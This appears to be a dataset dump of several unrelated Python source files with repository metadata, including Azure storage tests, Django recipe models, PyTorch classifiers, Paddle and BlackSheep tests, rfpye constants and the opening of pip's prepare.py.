        token = StorageUtilities.get_storage_token(self.session)
        self.assertIsNotNone(token.token)

    def test_get_storage_primary_key(self):
        """The primary key is the first key returned by the management API."""
        key1 = StorageAccountKey()
        key1.key_name = "key1"
        key1.value = "mock_storage_key"
        data = StorageAccountListKeysResult()
        data.keys = [key1]
        with patch(self._get_storage_client_string() + '.list_keys', return_value=data) \
                as list_keys_mock:
            primary_key = StorageUtilities.get_storage_primary_key(
                'mock_rg_group', 'mock_account', self.session)
            list_keys_mock.assert_called_with('mock_rg_group', 'mock_account')
            self.assertEqual(primary_key, data.keys[0].value)

    @arm_template('storage.json')
    def test_get_blob_client_from_storage_account_without_sas(self):
        """A token-based blob client is returned when no SAS is requested."""
        account = self.setup_account()
        resource_group = ResourceIdParser.get_resource_group(account.id)
        blob_client = StorageUtilities.get_blob_client_from_storage_account(
            resource_group,
            account.name,
            self.session)
        self.assertIsNotNone(blob_client)

    @arm_template('storage.json')
    def test_get_blob_client_from_storage_account_without_sas_fails_sas_generation(self):
        """Without account keys, generating a SAS from a token client must fail."""
        with self.assertRaises(ValueError):
            account = self.setup_account()
            resource_group = ResourceIdParser.get_resource_group(account.id)
            blob_client = StorageUtilities.get_blob_client_from_storage_account(
                resource_group,
                account.name,
                self.session)
            # create container for package
            blob_client.create_container('test')
            blob_client.create_blob_from_text('test', 'test.txt', 'My test contents.')
            blob_client.generate_blob_shared_access_signature('test', 'test.txt')

    @arm_template('storage.json')
    def test_get_blob_client_from_storage_account_with_sas(self):
        """With generate_sas=True the client can mint a shared access signature."""
        account = self.setup_account()
        resource_group = ResourceIdParser.get_resource_group(account.id)
        blob_client = StorageUtilities.get_blob_client_from_storage_account(
            resource_group,
            account.name,
            self.session,
            True)
        # create sas token for blob
        blob_client.create_container('test')
        blob_client.create_blob_from_text('test', 'test.txt', 'My test contents.')
        sas = blob_client.generate_blob_shared_access_signature('test', 'test.txt')
        self.assertIsNotNone(sas)

    def _get_storage_client_string(self):
        # Build the fully-qualified module.class path of the storage-accounts
        # operations object so tests can patch its methods by string.
        client = local_session(Session)\
            .client('azure.mgmt.storage.StorageManagementClient').storage_accounts
        return client.__module__ + '.' + client.__class__.__name__
| 42.725389
| 99
| 0.697187
|
acff7c39949a3dd25a3fb5485c3957c490664e2b
| 2,615
|
py
|
Python
|
app/core/models.py
|
Robooto/recipe-app-api
|
ab53c2a37f51031d8048570ee5b05bd6a26a284c
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
Robooto/recipe-app-api
|
ab53c2a37f51031d8048570ee5b05bd6a26a284c
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
Robooto/recipe-app-api
|
ab53c2a37f51031d8048570ee5b05bd6a26a284c
|
[
"MIT"
] | null | null | null |
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
    """Generate a unique upload path for a new recipe image.

    Args:
        instance: The model instance the file is attached to (unused,
            required by Django's ``upload_to`` signature).
        filename: The original uploaded file name.

    Returns:
        A path of the form ``uploads/recipe/<uuid4><ext>``, preserving the
        original extension (or omitting it when the name has none).
    """
    # BUGFIX: ``filename.split('.')[-1]`` turned an extensionless name into
    # its own "extension" (e.g. 'noext' -> '<uuid>.noext'). splitext keeps
    # only a genuine trailing extension, dot included.
    ext = os.path.splitext(filename)[1]
    unique_name = f'{uuid.uuid4()}{ext}'
    return os.path.join('uploads/recipe/', unique_name)
class UserManager(BaseUserManager):
    """Manager that creates users keyed by email instead of a username."""

    def create_user(self, email, password=None, **extra_fields):
        """Create, save and return a new user with a normalized email."""
        if not email:
            raise ValueError('Users must have an email address.')
        new_user = self.model(email=self.normalize_email(email), **extra_fields)
        # set_password hashes the raw password (or marks it unusable for None).
        new_user.set_password(password)
        new_user.save(using=self._db)
        return new_user

    def create_superuser(self, email, password):
        """Create, save and return a new superuser with staff privileges."""
        superuser = self.create_user(email, password)
        superuser.is_staff = True
        superuser.is_superuser = True
        superuser.save(using=self._db)
        return superuser
class User(AbstractBaseUser, PermissionsMixin):
    """Custom user model that supports using email instead of username"""
    # Unique login identifier, used in place of Django's default username.
    email = models.EmailField(max_length=255, unique=True)
    # Display name; not used for authentication.
    name = models.CharField(max_length=255)
    # Deactivation flag honoured by Django's authentication backends.
    is_active = models.BooleanField(default=True)
    # Grants access to the Django admin site.
    is_staff = models.BooleanField(default=False)
    objects = UserManager()
    # Authenticate with the email field instead of a username.
    USERNAME_FIELD = 'email'
class Tag(models.Model):
    """Tag to be used with a recipe."""
    name = models.CharField(max_length=255)
    # Owning user; tags are deleted together with their user.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
    )

    def __str__(self):
        # Human-readable representation (admin, shell, templates).
        return self.name
class Ingredient(models.Model):
    """Ingredient to be used in a recipe"""
    name = models.CharField(max_length=255)
    # Owning user; ingredients are deleted together with their user.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE
    )

    def __str__(self):
        # Human-readable representation (admin, shell, templates).
        return self.name
class Recipe(models.Model):
    """Recipe object"""
    # Owning user; recipes are deleted together with their user.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE
    )
    title = models.CharField(max_length=255)
    # Preparation time in minutes.
    time_minutes = models.IntegerField()
    # Up to 999.99 in the site currency.
    price = models.DecimalField(max_digits=5, decimal_places=2)
    # Optional external URL for the recipe.
    link = models.CharField(max_length=255, blank=True)
    ingredients = models.ManyToManyField('Ingredient')
    tags = models.ManyToManyField('Tag')
    # Optional image; stored under the path built by recipe_image_file_path.
    image = models.ImageField(null=True, upload_to=recipe_image_file_path)

    def __str__(self):
        # Human-readable representation (admin, shell, templates).
        return self.title
| 28.736264
| 76
| 0.671511
|
acff7c42390735abc5226c8b99d6083de7639f59
| 4,501
|
py
|
Python
|
extrinsic/bios_codes/models.py
|
MSR-LIT/MultilingualBias
|
37dbc7ff4ec2d35edd4f3fe19feb872f2dde128e
|
[
"MIT"
] | 2
|
2020-07-15T04:18:20.000Z
|
2020-08-03T02:50:21.000Z
|
extrinsic/bios_codes/models.py
|
MSR-LIT/MultilingualBias
|
37dbc7ff4ec2d35edd4f3fe19feb872f2dde128e
|
[
"MIT"
] | null | null | null |
extrinsic/bios_codes/models.py
|
MSR-LIT/MultilingualBias
|
37dbc7ff4ec2d35edd4f3fe19feb872f2dde128e
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn.functional as F
from rnn_encoder import GRUEncoder
from utils import get_sequences_lengths, softmax_masked, to_device
class CountsModel(torch.nn.Module):
    """Linear classifier over precomputed (count-style) feature vectors."""

    def __init__(self, input_size, output_size, dropout):
        super().__init__()
        self.input_size = input_size
        self.output_size = output_size
        self.dropout = dropout
        self.classifier = torch.nn.Linear(input_size, output_size)

    def forward(self, inputs):
        """Return unnormalized class logits for a batch of feature vectors."""
        features = inputs
        # Dropout is applied only when a non-zero rate was configured;
        # F.dropout is already a no-op outside training mode.
        if self.dropout != 0:
            features = F.dropout(features, self.dropout, self.training)
        return self.classifier(features)
class RNNModel(torch.nn.Module):
    """Bidirectional GRU sentence encoder followed by a linear classifier."""

    def __init__(self, embedding_size, vocab_size, trainable_embeddings, hidden_size, output_size, dropout, W_emb=None,
                 padding_idx=0):
        super().__init__()
        self.hidden_size = hidden_size
        self.dropout = dropout
        self.padding_idx = padding_idx

        self.embedding = torch.nn.Embedding(vocab_size, embedding_size, padding_idx=padding_idx)
        if W_emb is not None:
            # Warm-start the embedding table from pretrained vectors.
            self.embedding.weight.data.copy_(torch.from_numpy(W_emb))
        if not trainable_embeddings:
            self.embedding.weight.requires_grad = False

        self.encoder_sentences = GRUEncoder(embedding_size, hidden_size, bidirectional=True, return_sequence=False)
        # 2 * hidden_size because the encoder is bidirectional.
        self.out = torch.nn.Sequential(
            torch.nn.Linear(hidden_size * 2, output_size),
        )

    def zero_state(self, batch_size):
        """Return an all-zero initial hidden state on the active device."""
        # will work on both GPU and CPU in contrast to just Variable(*state_shape)
        return to_device(torch.zeros(2, batch_size, self.hidden_size))

    def encode(self, inputs):
        """Embed token ids and encode each sequence into a single vector."""
        lengths = get_sequences_lengths(inputs)
        embedded = self.embedding(inputs)
        encoded = self.encoder_sentences(embedded, lengths)
        return F.dropout(encoded, self.dropout, self.training)

    def get_logits(self, inputs_att):
        """Project encoded sentence vectors to class logits."""
        return self.out(inputs_att)

    def forward(self, inputs):
        return self.get_logits(self.encode(inputs))
class HANModel(torch.nn.Module):
    """Attention-pooled sequence classifier: bidirectional GRU over token
    embeddings, masked additive attention over time steps, linear output.

    NOTE(review): depends on the project-local ``GRUEncoder``,
    ``get_sequences_lengths``, ``softmax_masked`` and ``to_device`` helpers.
    """

    def __init__(self, embedding_size, vocab_size, trainable_embeddings, hidden_size, attention_size, output_size, dropout, W_emb=None,
                 padding_idx=0):
        super().__init__()
        self.padding_idx = padding_idx
        self.dropout = dropout
        self.hidden_size = hidden_size
        self.embedding = torch.nn.Embedding(vocab_size, embedding_size, padding_idx=padding_idx)
        # Optionally initialize from pretrained embeddings (numpy array).
        if W_emb is not None:
            self.embedding.weight.data.copy_(torch.from_numpy(W_emb))
        if not trainable_embeddings:
            self.embedding.weight.requires_grad = False
        # return_sequence=True keeps per-token states for attention pooling.
        self.encoder_sentences = GRUEncoder(embedding_size, hidden_size, bidirectional=True,
                                            return_sequence=True)
        # Two linear maps produce one attention score per time step.
        self.att_sentences = torch.nn.Linear(hidden_size * 2, attention_size)
        self.att_reduce = torch.nn.Linear(attention_size, 1, bias=False)
        self.out = torch.nn.Sequential(
            torch.nn.Linear(hidden_size * 2, output_size),
        )

    def zero_state(self, batch_size):
        """Return an all-zero initial hidden state, shape (2, batch, hidden)."""
        state_shape = (2, batch_size, self.hidden_size)
        # will work on both GPU and CPU in contrast to just Variable(*state_shape)
        h = to_device(torch.zeros(*state_shape))
        return h

    def encode_sentences(self, inputs):
        """Encode padded token ids and pool with masked attention.

        Returns ``(pooled_features, attention_weights)``.
        """
        # True for real tokens, False for padding positions.
        mask = inputs != self.padding_idx
        inputs_len = get_sequences_lengths(inputs)
        inputs_emb = self.embedding(inputs)
        inputs_enc = self.encoder_sentences(inputs_emb, inputs_len)
        inputs_enc = F.dropout(inputs_enc, self.dropout, self.training)
        # Encoder output may be shorter than the padded input; trim the mask.
        mask = mask[:, :inputs_enc.size(1)]
        att_vec = self.att_sentences(inputs_enc)
        att_weights = self.att_reduce(att_vec)
        # Softmax over time steps, ignoring padded positions.
        att = softmax_masked(att_weights, mask.unsqueeze(-1))
        # Weighted sum over time -> one vector per sequence.
        inputs_att = torch.sum(inputs_enc * att, dim=1)
        inputs_att = F.dropout(inputs_att, self.dropout, self.training)
        return inputs_att, att

    def get_logits(self, inputs_att):
        """Project pooled features to unnormalized class scores."""
        logits = self.out(inputs_att)
        return logits

    def forward(self, inputs):
        """Full pipeline: token ids -> logits (attention weights discarded)."""
        inputs_att, att = self.encode_sentences(inputs)
        logits = self.get_logits(inputs_att)
        return logits
| 33.589552
| 135
| 0.666741
|
acff7daadeb33114646398a0a78250535e73f3aa
| 2,090
|
py
|
Python
|
python/paddle/fluid/tests/unittests/test_nn_functional_embedding_dygraph.py
|
zmxdream/Paddle
|
04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c
|
[
"Apache-2.0"
] | 17,085
|
2016-11-18T06:40:52.000Z
|
2022-03-31T22:52:32.000Z
|
python/paddle/fluid/tests/unittests/test_nn_functional_embedding_dygraph.py
|
zmxdream/Paddle
|
04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c
|
[
"Apache-2.0"
] | 29,769
|
2016-11-18T06:35:22.000Z
|
2022-03-31T16:46:15.000Z
|
python/paddle/fluid/tests/unittests/test_nn_functional_embedding_dygraph.py
|
zmxdream/Paddle
|
04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c
|
[
"Apache-2.0"
] | 4,641
|
2016-11-18T07:43:33.000Z
|
2022-03-31T15:15:02.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle
import paddle.nn as nn
import numpy as np
paddle.disable_static()
class EmbeddingDygraph(unittest.TestCase):
    """Dygraph-mode tests for ``paddle.nn.Embedding``."""

    def test_1(self):
        # Sparse embedding with a padding index: a full forward/backward/
        # optimizer-step cycle should run without error on CPU.
        x_data = np.arange(3, 6).reshape((3, 1)).astype(np.int64)
        paddle.disable_static(paddle.CPUPlace())
        x = paddle.to_tensor(x_data, stop_gradient=False)
        embedding = paddle.nn.Embedding(10, 3, sparse=True, padding_idx=9)
        # Deterministic weights so the step is reproducible.
        w0 = np.full(shape=(10, 3), fill_value=2).astype(np.float32)
        embedding.weight.set_value(w0)
        adam = paddle.optimizer.Adam(
            parameters=[embedding.weight], learning_rate=0.01)
        adam.clear_grad()
        out = embedding(x)
        out.backward()
        adam.step()

    def test_2(self):
        # Invalid constructor arguments must raise ValueError:
        # padding_idx out of range, negative vocabulary size, negative dim.
        x_data = np.arange(3, 6).reshape((3, 1)).astype(np.int64)
        y_data = np.arange(6, 12).reshape((3, 2)).astype(np.float32)
        paddle.disable_static(paddle.CPUPlace())
        x = paddle.to_tensor(x_data, stop_gradient=False)
        y = paddle.to_tensor(y_data, stop_gradient=False)
        with self.assertRaises(ValueError):
            embedding = paddle.nn.Embedding(10, 3, padding_idx=11, sparse=True)
        with self.assertRaises(ValueError):
            embedding = paddle.nn.Embedding(-1, 3, sparse=True)
        with self.assertRaises(ValueError):
            embedding = paddle.nn.Embedding(10, -3, sparse=True)
if __name__ == '__main__':
unittest.main()
| 32.65625
| 79
| 0.681818
|
acff7e2968664548bce9de246ff305a07ad5aff7
| 511
|
py
|
Python
|
2020/Python/day10/part1.py
|
tymscar/Advent-Of-Code
|
cd7b96b0253191e236bd704b0d8b5540fb3e8ef6
|
[
"MIT"
] | 4
|
2019-12-08T08:20:53.000Z
|
2021-12-17T12:04:11.000Z
|
2020/Python/day10/part1.py
|
tymscar/AdventOfCode2018
|
9742ddb6bbbc917062baad87d6b6de75375f1ae8
|
[
"MIT"
] | null | null | null |
2020/Python/day10/part1.py
|
tymscar/AdventOfCode2018
|
9742ddb6bbbc917062baad87d6b6de75375f1ae8
|
[
"MIT"
] | 4
|
2020-12-11T22:10:24.000Z
|
2021-12-25T22:39:05.000Z
|
def part_1(path='input.txt'):
    """Advent of Code 2020 day 10, part 1.

    Reads one adapter joltage per line from *path*, chains every adapter
    from the outlet (0 jolts) to the device (highest adapter + 3), and
    returns the count of 1-jolt gaps multiplied by the count of 3-jolt gaps.

    :param path: input file name; defaults to 'input.txt' so existing
        callers (``part_1()``) keep working.
    """
    # 'with' guarantees the handle is closed (the original leaked it).
    with open(path, 'r') as file:
        adapters = [int(line) for line in file]
    jolts = sorted([0] + adapters)
    # The device is always rated 3 jolts above the highest adapter.
    jolts.append(max(adapters, default=0) + 3)
    one_jumps = sum(1 for a, b in zip(jolts, jolts[1:]) if b - a == 1)
    # Mirrors the original logic: every non-1 gap counts as a 3-jolt jump.
    three_jumps = len(jolts) - 1 - one_jumps
    return one_jumps * three_jumps
print(part_1())
| 18.925926
| 41
| 0.518591
|
acff7e50f2e8e7b11748227837aac0ed14a416a2
| 6,662
|
py
|
Python
|
rfpye/constants.py
|
ronaldokun/rfpye
|
cff49b03887166740bf3b1da40913e22b6523ef2
|
[
"Apache-2.0"
] | null | null | null |
rfpye/constants.py
|
ronaldokun/rfpye
|
cff49b03887166740bf3b1da40913e22b6523ef2
|
[
"Apache-2.0"
] | 7
|
2021-06-03T18:47:23.000Z
|
2021-10-31T23:41:39.000Z
|
rfpye/constants.py
|
ronaldokun/rfpye
|
cff49b03887166740bf3b1da40913e22b6523ef2
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/04_constants.ipynb (unless otherwise specified).
__all__ = ['BYTES_HEADER', 'ENDMARKER', 'EXCLUDE_ATTRS', 'DICT_PROCESSING', 'DICT_UNIT', 'TUNING_BLOCK', 'BYTES_TIMED',
'BYTES_TIMED_NE', 'BYTES_6', 'BYTES_20', 'BYTES_21', 'BYTES_24', 'BYTES_40', 'BYTES_41', 'BYTES_42',
'BYTES_51', 'BYTES_64', 'BYTES_65', 'BYTES_V5', 'BYTES_66', 'BYTES_67', 'KEY_ATTRS', 'TIMED_BLOCKS',
'SPECTRAL_BLOCKS', 'OCC', 'VECTOR_BLOCKS', 'UNCOMPRESSED', 'COMPRESSED', 'GPS_BLOCK', 'BLOCK_ATTRS']
# Cell
from typing import Mapping, List, Tuple
# Cell
# Byte length of the fixed header at the start of the file (per the name).
BYTES_HEADER = 36
# Four-byte marker that terminates a block.
ENDMARKER: bytes = b"UUUU"
# Attribute names excluded when dumping/printing block objects.
# Annotation fixed: the literal below is a tuple, not a list.
EXCLUDE_ATTRS: Tuple = (
    "count",
    "index",
    "checksum",
    "default",
    "walldate",
    "walltime",
    "wallnano",
    "wallclock_datetime",
    "timestamp",
    "data",
    "raw_data",
    "levels",
    "matrix",
    "frequencies",
    "agc",
    "tunning",
)
# Numeric code -> spectrum processing mode label.
DICT_PROCESSING: Mapping[int, str] = {
    0: "single measurement",
    1: "average",
    2: "peak",
    3: "minimum",
}
# Numeric code -> measurement unit label.
DICT_UNIT: Mapping[int, str] = {0: "dBm", 1: "dBμV/m"}
# Numeric code -> tuning/capture completion status description.
TUNING_BLOCK: Mapping[int, str] = {
    0: "completed without error",
    1: "error occurred",
    2: "radio produced an error",
    3: "GPRS transmission occured during capture",
    4: "ADC overflowed during capture",
}
BYTES_TIMED: Mapping[int, slice] = {
0: slice(0, 4),
1: slice(4, 8),
2: slice(8, 12),
3: slice(12, 14),
4: slice(14, 18),
5: slice(18, 20),
6: slice(20, 24),
7: slice(24, 26),
8: slice(26, 28),
}
BYTES_TIMED_NE: Mapping[int, slice] = {0: slice(0, 4), 1: slice(4, 8), 2: slice(8, 12)}
BYTES_6: Mapping[int, slice] = {
0: slice(0, 4),
1: slice(4, 8),
2: slice(8, 12),
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 24),
}
BYTES_20: Mapping[int, slice] = {
0: slice(0, 4),
1: slice(4, 8),
2: slice(8, 12),
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 24),
6: slice(24, 28),
7: slice(28, 32),
8: slice(32, 36),
9: slice(36, 40),
}
BYTES_21: Mapping[int, slice] = {0: slice(0, 16), 1: slice(16, 20)}
BYTES_24: Mapping[int, slice] = {0: slice(0, 4), 1: slice(4, 8)}
BYTES_40: Mapping[int, slice] = {
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 21),
6: slice(21, 22),
7: slice(22, 24),
8: slice(24, 28),
9: slice(28, 32),
10: slice(32, 36),
11: slice(36, 40),
}
BYTES_41: Mapping[int, slice] = {3: slice(12, 44), 4: slice(44, 48)}
BYTES_42: Mapping[int, slice] = {
3: slice(12, 16),
4: slice(16, 20),
5: slice(20, 52),
6: slice(52, 56),
}
BYTES_51: Mapping[int, slice] = {5: slice(20, 24)}
BYTES_64: Mapping[int, slice] = {22: slice(52, 56), 23: slice(56, 60)}
BYTES_65: Mapping[int, slice] = {
9: slice(28, 32),
10: slice(32, 33),
11: slice(33, 34),
12: slice(34, 36),
13: slice(36, 37),
14: slice(37, 38),
15: slice(38, 39),
16: slice(39, 40),
17: slice(40, 42),
18: slice(42, 44),
19: slice(44, 48),
}
BYTES_V5: Mapping[int, slice] = {3: slice(12, 16), 4: slice(16, 20), 5: slice(20, 24)}
BYTES_66: Mapping[int, slice] = {3: slice(12, 16), 4: slice(16, 20), 5: slice(20, 24)}
BYTES_67: Mapping[int, slice] = {3: slice(12, 16), 4: slice(16, 20), 5: slice(20, 24)}
# Cell
KEY_ATTRS = {
3: ('description',),
4: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"ndata",
"processing",
),
5: (),
6: (),
7: (
"type",
"thread_id",
"thresh",
"minimum",
"start_mega",
"stop_mega",
"ndata",
),
8: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"sampling",
"ndata",
),
20: (
"n_spectral_blocks",
"nddt",
),
21: ("hostname", "method", "unit_info", "file_number"),
22: ('description',),
23: (),
24: ('description',),
40: ("gps_status",),
41: ("identifier",),
42: ("identifier",),
51: (),
60: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"ndata",
"nloops",
"processing",
"antuid",
),
61: (
"type",
"thread_id",
"thresh",
"minimum",
"start_mega",
"stop_mega",
"ndata",
"nloops",
"processing",
"antuid",
),
62: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"thresh",
"sampling",
"ndata",
"antuid",
),
63: (
"type",
"thread_id",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"processing",
"antuid",
),
64: (
"type",
"thread_id",
"thresh",
"minimum",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"processing",
"antuid",
),
65: (
"type",
"thread_id",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"processing",
"antuid",
),
67: (
"type",
"thread_id",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"bw",
"processing",
"antuid",
),
68: (
"type",
"thread_id",
"thresh",
"description",
"start_mega",
"stop_mega",
"minimum",
"dtype",
"ndata",
"bw",
"processing",
"antuid",
),
69: (
"type",
"thread_id",
"description",
"start_mega",
"stop_mega",
"dtype",
"ndata",
"bw",
"opcount",
"antuid",
),
}
# Block-ID groupings used to dispatch parsing/handling logic.
TIMED_BLOCKS = (40, 41, 42, 51, 63, 64, 65, 66, 67, 68, 69)
SPECTRAL_BLOCKS = (4, 7, 60, 61, 63, 64, 67, 68)
OCC = (8, 62, 65, 69)
VECTOR_BLOCKS = SPECTRAL_BLOCKS + OCC
UNCOMPRESSED = (4, 60, 63, 67) + OCC
COMPRESSED = (7, 61, 64, 68)
GPS_BLOCK = 40
# Block type -> tuple of extra attribute names exposed by that block type.
# FIX: single-name entries were written as ("wallclock_datetime") — a plain
# string, not a one-element tuple — contradicting the Mapping[int, Tuple]
# annotation and the multi-name entry for block 40, and making iteration
# yield characters. Trailing commas added to make them real 1-tuples.
BLOCK_ATTRS: Mapping[int, Tuple] = {
    8: ("wallclock_datetime",),
    21: (),
    40: (
        "gps_datetime",
        "latitude",
        "longitude",
        "altitude",
        "num_satellites",
    ),
    41: (),
    42: (),
    60: ("wallclock_datetime",),
    61: ("wallclock_datetime",),
    62: ("wallclock_datetime",),
    63: ("wallclock_datetime",),
    64: ("wallclock_datetime",),
    65: ("wallclock_datetime",),
    67: ("wallclock_datetime",),
    68: ("wallclock_datetime",),
    69: ("wallclock_datetime",),
}
| 20.689441
| 119
| 0.487241
|
acff7e7d25bf5fa845cb3a21f14dd5a94841b5c4
| 5,565
|
py
|
Python
|
tests/test_files_handler.py
|
skivis/BlackSheep
|
486f04ba2045f31dd3e188f52c45a275eb150967
|
[
"MIT"
] | 482
|
2018-12-20T09:30:23.000Z
|
2021-02-08T18:34:16.000Z
|
tests/test_files_handler.py
|
skivis/BlackSheep
|
486f04ba2045f31dd3e188f52c45a275eb150967
|
[
"MIT"
] | 125
|
2021-02-15T09:29:51.000Z
|
2022-03-25T19:48:23.000Z
|
tests/test_files_handler.py
|
skivis/BlackSheep
|
486f04ba2045f31dd3e188f52c45a275eb150967
|
[
"MIT"
] | 27
|
2021-03-20T16:17:58.000Z
|
2022-03-02T19:37:42.000Z
|
import asyncio
import os
import pathlib
import shutil
from uuid import uuid4
import pytest
from blacksheep.common.files.asyncfs import FileContext, FilesHandler
@pytest.fixture()
def files_folder():
    """Absolute path of the static fixture directory ('files') next to this test."""
    return pathlib.Path(__file__).parent.absolute() / "files"
@pytest.fixture(scope="module")
def temp_files_folder():
    """Module-scoped scratch directory ('.out'); deleted after the module runs."""
    temp_folder = pathlib.Path(__file__).parent.absolute() / ".out"
    if not temp_folder.exists():
        os.makedirs(temp_folder)
    yield temp_folder
    # Teardown: remove everything the write tests created.
    shutil.rmtree(temp_folder)
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "file_name", ["example.txt", "pexels-photo-126407.jpeg", "README.md"]
)
async def test_read_file(files_folder: pathlib.Path, file_name: str):
    """FilesHandler.read must return the same bytes as a blocking binary read."""
    handler = FilesHandler()
    target = str(files_folder / file_name)
    actual = await handler.read(target)
    with open(target, mode="rb") as fh:
        expected = fh.read()
    assert actual == expected
@pytest.mark.asyncio
@pytest.mark.parametrize("file_name", ["example.txt", "README.md"])
async def test_read_file_rt_mode(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
contents = await handler.read(full_file_path, mode="rt")
with open(full_file_path, mode="rt") as f:
expected_contents = f.read()
assert contents == expected_contents
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name", ["example.txt", "pexels-photo-126407.jpeg", "README.md"]
)
async def test_read_file_with_open(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
async with handler.open(full_file_path) as file_context:
contents = await file_context.read()
with open(full_file_path, mode="rb") as file:
expected_contents = file.read()
assert contents == expected_contents
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name,index,size",
[
["example.txt", 0, 10],
["example.txt", 10, 10],
["example.txt", 5, 15],
["README.md", 0, 10],
["README.md", 10, 10],
["README.md", 5, 15],
],
)
async def test_seek_and_read_chunk(
files_folder: pathlib.Path, file_name: str, index: int, size: int
):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
async with handler.open(full_file_path) as file_context:
await file_context.seek(index)
chunk_read_async = await file_context.read(size)
with open(full_file_path, mode="rb") as file:
file.seek(index)
chunk_read = file.read(size)
assert chunk_read_async == chunk_read
@pytest.mark.asyncio
@pytest.mark.parametrize(
"file_name", ["example.txt", "pexels-photo-126407.jpeg", "README.md"]
)
async def test_read_file_chunks(files_folder: pathlib.Path, file_name: str):
handler = FilesHandler()
full_file_path = str(files_folder / file_name)
chunk: bytes
chunk_size = 1024
contents = b""
expected_contents = b""
async with handler.open(full_file_path) as file_context:
async for chunk in file_context.chunks(chunk_size):
assert chunk is not None
contents += chunk
with open(full_file_path, mode="rb") as f:
while True:
chunk = f.read(chunk_size)
if not chunk:
break
expected_contents += chunk
assert contents == expected_contents
@pytest.mark.asyncio
async def test_write_file(temp_files_folder: pathlib.Path):
    """FilesHandler.write must persist the given bytes to disk verbatim."""
    handler = FilesHandler()
    file_name = str(uuid4()) + ".txt"
    target = str(temp_files_folder / file_name)
    payload = b"Lorem ipsum dolor sit"
    await handler.write(target, payload)
    with open(target, mode="rb") as fh:
        assert payload == fh.read()
@pytest.mark.asyncio
async def test_write_file_text_mode(temp_files_folder: pathlib.Path):
handler = FilesHandler()
file_name = str(uuid4()) + ".txt"
full_file_path = str(temp_files_folder / file_name)
contents = "Lorem ipsum dolor sit"
await handler.write(full_file_path, contents, mode="wt")
with open(full_file_path, mode="rt") as f:
expected_contents = f.read()
assert contents == expected_contents
@pytest.mark.asyncio
async def test_write_file_with_iterable(temp_files_folder: pathlib.Path):
handler = FilesHandler()
file_name = str(uuid4()) + ".txt"
full_file_path = str(temp_files_folder / file_name)
async def provider():
yield b"Lorem "
await asyncio.sleep(0.01)
yield b"ipsum"
await asyncio.sleep(0.01)
yield b" dolor"
yield b" sit"
await handler.write(full_file_path, provider)
with open(full_file_path, mode="rb") as f:
expected_contents = f.read()
assert b"Lorem ipsum dolor sit" == expected_contents
@pytest.mark.asyncio
async def test_file_context_raises_for_invalid_mode():
    """Opening with an unknown mode string must raise ValueError."""
    handler = FilesHandler()
    with pytest.raises(ValueError) as error_info:
        async with handler.open("foo.txt", mode="xx") as file_context:
            file_context.write("Foo")
    assert "invalid mode" in str(error_info.value)
@pytest.mark.asyncio
async def test_file_context_raises_if_file_is_not_open():
    """Reading from a FileContext that was never opened must raise TypeError."""
    with pytest.raises(TypeError) as error_info:
        file_context = FileContext("foo.txt")
        await file_context.read()
    assert str(error_info.value) == "The file is not open."
| 27.686567
| 79
| 0.687332
|
acff7ffa1f7940a84d279f6e19cd90f1649c374e
| 23,290
|
py
|
Python
|
src/pip/_internal/operations/prepare.py
|
finn0/pip
|
e408f7077f2acceaa3c751f60eb466fcc676af7c
|
[
"MIT"
] | null | null | null |
src/pip/_internal/operations/prepare.py
|
finn0/pip
|
e408f7077f2acceaa3c751f60eb466fcc676af7c
|
[
"MIT"
] | null | null | null |
src/pip/_internal/operations/prepare.py
|
finn0/pip
|
e408f7077f2acceaa3c751f60eb466fcc676af7c
|
[
"MIT"
] | null | null | null |
"""Prepares a distribution for installation
"""
# The following comment should be removed at some point in the future.
# mypy: strict-optional=False
import logging
import mimetypes
import os
import shutil
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.six import PY2
from pip._internal.distributions import (
make_distribution_for_install_requirement,
)
from pip._internal.distributions.installed import InstalledDistribution
from pip._internal.exceptions import (
DirectoryUrlHashUnsupported,
HashMismatch,
HashUnpinned,
InstallationError,
NetworkConnectionError,
PreviousBuildDirError,
VcsHashUnsupported,
)
from pip._internal.models.wheel import Wheel
from pip._internal.network.download import BatchDownloader, Downloader
from pip._internal.network.lazy_wheel import (
HTTPRangeRequestUnsupported,
dist_from_wheel_url,
)
from pip._internal.utils.filesystem import copy2_fixed
